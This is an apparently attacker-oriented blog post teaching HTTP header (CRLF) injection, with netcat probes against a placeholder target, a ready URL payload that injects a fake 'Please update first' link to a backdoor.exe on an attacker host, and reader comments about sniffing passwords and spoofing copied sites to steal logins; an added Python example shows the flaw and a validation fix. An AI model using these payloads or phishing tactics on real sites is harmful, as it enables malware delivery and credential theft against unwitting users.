HTTP header injection

The site has moved to the root domain, where all posts have been imported. Please go to http://pusheax.com/

If we can inject a newline into a header we control, then we will be able to insert additional HTTP headers and some nasty body text. I don’t think we can compromise a website/server via this vulnerability. But it is still powerful for social engineering attacks, phishing, redirecting to malicious sites, downloading backdoors, virtual defacement, sometimes injecting cookies, etc. It is much like XSS.

Basically, this vulnerability is found in the “set-cookie” and “location” headers. If we connect to a website:

nc -vv target.com 80
GET /something.php?id=1&pay=40000&method=credit HTTP/1.1
After this GET request we get something like this (try to find it):

set-cookie=PaymentMethod=credit

If this is the behavior of the host, then we should try to insert a carriage return and line feed:

nc -vv target.com 80  
GET /something.php?id=1&pay=40000&method=credit%0d%0a it-is=vulnerable HTTP/1.1

If the host is vulnerable, then it will reply with an additional line “it-is=vulnerable” like this:

set-cookie=PaymentMethod=credit

it-is=vulnerable 
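Why the extra line appears, and one way to stop it, shown as an added example that is not part of the original post. The function names and the raw-response builder are hypothetical stand-ins for the server code behind something.php, and the probe string is constructed from the one above.

```python
from urllib.parse import unquote

# Constructed sample inputs modelled on the post's "method" parameter.
BENIGN = "credit"
PROBE = "credit%0d%0ait-is=vulnerable"


def build_response_vulnerable(method_raw: str) -> bytes:
    """Hypothetical handler: copies the URL-decoded value into Set-Cookie unchecked."""
    method = unquote(method_raw)  # %0d%0a becomes a real CR LF here
    head = (
        "HTTP/1.1 200 OK\r\n"
        f"Set-Cookie: PaymentMethod={method}\r\n"
        "Content-Length: 0\r\n\r\n"
    )
    return head.encode("latin-1")


def safe_header_value(value: str) -> str:
    """Refuse CR, LF and every other control character in a header value."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        raise ValueError("control character in header value")
    return value


def build_response_hardened(method_raw: str) -> bytes:
    """Same handler, but the decoded value is validated before it is used."""
    method = safe_header_value(unquote(method_raw))
    head = (
        "HTTP/1.1 200 OK\r\n"
        f"Set-Cookie: PaymentMethod={method}\r\n"
        "Content-Length: 0\r\n\r\n"
    )
    return head.encode("latin-1")


def header_lines(raw: bytes) -> list[str]:
    """Header lines as a client splits them (status line dropped)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    return head.split("\r\n")[1:]


if __name__ == "__main__":
    print(header_lines(build_response_vulnerable(PROBE)))
    try:
        build_response_hardened(PROBE)
    except ValueError as exc:
        print("rejected:", exc)
```

Validation has to run on the decoded value, since the raw query string contains only `%0d%0a` and no literal control bytes.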

A hacker can simply force users to download a backdoor:

http://target.com/something.php?id=1&pay=40000&method=credit%0d%0a
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1

We can also create a fake cookie and send the URL to the poor victim. Just think smartly and you will find some other ways 😉

Be aware!!!

5 Replies to “HTTP header injection”

  1. Sniff the remote way, it's normal using HTTP so you can just sniff the pass out in LAN, else just spoof "copy website" and make it send info to your website, but why steal Facebook hahahahaha really it's for kids

  2. He doesn't need to "proof it" because this is basic knowledge. I'm sure if you knew a thing about spoofing passwords then you would need him to "proof it".
